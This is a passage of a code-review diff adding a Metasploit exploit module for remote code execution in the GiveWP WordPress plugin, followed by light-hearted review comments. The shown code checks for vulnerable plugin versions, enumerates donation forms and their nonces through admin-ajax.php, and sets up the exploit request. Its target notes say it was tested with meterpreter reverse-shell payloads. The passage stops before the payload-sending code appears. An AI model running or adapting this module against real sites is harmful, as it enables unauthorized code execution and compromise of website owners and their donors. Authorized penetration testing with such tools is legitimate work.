modules/exploits/multi/http/wp_givewp_rce.rb

```diff
@@ -0,0 +1,175 @@
+        ],
+        'DisclosureDate' => '2024-08-25',
+        'Platform' => %w[unix linux win],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command Shell',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+      )
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    print_status("WordPress Version: #{wordpress_version}") if wordpress_version
+    check_code = check_plugin_version_from_readme('give', '3.14.2')
+    return CheckCode::Safe unless check_code.code == 'appears'
+
+    print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}")
+    CheckCode::Appears
+  end
+
+  def exploit
+    forms = fetch_form_list
+    fail_with(Failure::UnexpectedReply, 'No forms found.') if forms.empty?
+
+    selected_form = forms.sample
+    valid_form = retrieve_and_analyze_form(selected_form['id'])
+
+    return print_error('Failed to retrieve a valid form for exploitation.') unless valid_form
+
+    print_status("Using Form ID: #{valid_form['give_form_id']} for exploitation.")
+    send_exploit_request(
+      valid_form['give_form_id'],
+      valid_form['give_form_hash'],
+      valid_form['give_price_id'],
+      valid_form['give_amount']
+    )
+  end
+
+  def fetch_form_list
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'data' => 'action=give_form_search'
+    )
+
+    return print_error('Failed to retrieve form list.') unless res&.code == 200
+
+    forms = JSON.parse(res.body)
+    form_ids = forms.map { |form| form['id'] }.sort
+
+    print_good("Successfully retrieved form list. Available Form IDs: #{form_ids.join(', ')}")
+    forms
+  end
+
+  def retrieve_and_analyze_form(form_id)
+    form_res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'vars_post' => { 'action' => 'give_donation_form_nonce', 'give_form_id' => form_id }
+    )
+
+    return unless form_res&.code == 200
+
+    form_data = JSON.parse(form_res.body)
+    give_form_id = form_id
+    give_form_hash = form_data['data']
+    give_price_id = '0'
+    give_amount = '$10.00'
```

Comment:
in this economy??

Reply:
I'm stingy, I only give 10 dollars 😂

Reply:
Nah, he's lying. He actually gives $0.99 instead.